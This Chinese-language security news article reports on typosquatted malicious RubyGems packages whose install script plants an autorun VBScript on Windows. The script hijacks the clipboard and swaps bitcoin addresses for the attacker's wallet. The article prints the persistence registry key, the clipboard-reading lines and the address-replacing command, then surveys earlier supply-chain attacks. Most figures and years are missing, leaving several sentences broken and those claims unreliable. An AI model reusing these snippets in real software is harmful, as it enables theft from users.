根据安全公司ReversingLabs有关报道,Ruby语言官方模块包代码库RubyGems,被植入了超个恶意软件包的。根据安全公司ReversingLabs的分析恶意软件包的下载量接近次,尽管其中很大一部分可能是脚本自动抓取了存储库中个软件包的结果。恶意软件包来自两个用户账户:PeterGibbons和JimCarrey。
ReversingLabs怀疑这些账户可能是一个人的工作,他们使用了多种形式的监听行为,冒充正常软件包。例如,atlas-client是一个诱骗的诱饵程序包,被次下载,用来模仿的atlas_client。从2月16日到25日,这两账号共上传了多个软件包。
攻击流程
根据ReversingLabs分析,这些恶意软件安装后将执行一个脚本,该脚本会拦截在Windows设备上进行的比特币付款。
首先,它使用%PROGRAMDATA%\MicrosoftEssentials\SoftwareEssentials.vbs路径中的主要恶意循环创建一个新的VBScriptSle保存到本机,然后创建一个新的自动运行注册表项:
HCU\Software\Microsoft\Windows\CurrentVersion\RunMicrosoftSoftwareEssentials。
实现重启后的自动运行。
执行SoftwareEssentials.vbs恶意脚本时,会启动无限循环,在该循环中,它使用以下代码行捕获用户的剪贴板数据:
SetobjHTML=CreateObject(htmlfile)
text=objHTML.ParentWindow.ClipboardData.GetData(text)
然后,脚本将检查剪贴板数据是否与比特币钱包地址的格式匹配。如果是,则使用以下命令在隐藏窗口中将比特币的地址替换为1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc:
WScript.ShellrunC:\Windows\System32\cmd.exe/cecho1JkU5XdNLji4Ugbb8agEWL1ko5US42nNmc
clip,0
这样,威胁参与者就试图将所有潜在的加密货币交易重定向到其钱包地址。整个过程如下顺序:
历史事件
无独有偶,这次供应链投毒事件不是第一次,这样事件最近几年来屡见不鲜。对RubyGems也发生了多起。年,一名大学生将一个粗略脚本上传到RubyGems,PyPi和NPM,根据对脚本中执行的回访调用统计,该冒名脚本大概在10个独立IP上执行了大概次,其代码成功获取管理权限的有一半。其中还有两个是以.mil结尾的域,表明美军内部的主机也被感染。
此后,类似技术开始流行。年,黑客给PyPi中注入了剪贴板劫持脚本。该恶意程序包的名称为Colourama,名字模仿Colorama。Colorama为Python包仓库中下载量Top20之一。包括从镜像站点的下载,恶意软件包被下载了次。
一个月后,有一次攻击者利用NPM植入后门,成功偷到比特币的事件。这次事件中,恶意后门被下载了万次下,从而使攻击者获得了最后的成功成就。
这些事件表明,针对软件供应链的污染投毒间接攻击已经成了一种常态,这类攻击可能没有直接攻击那样明显,但是针对该类攻击目前还没有有效的防护措施,只能让开发人员擦亮眼睛,对要下载的软件包一定要慎重,可以通过必要的校验方法来保证包合法,比如验证文件包哈希,同时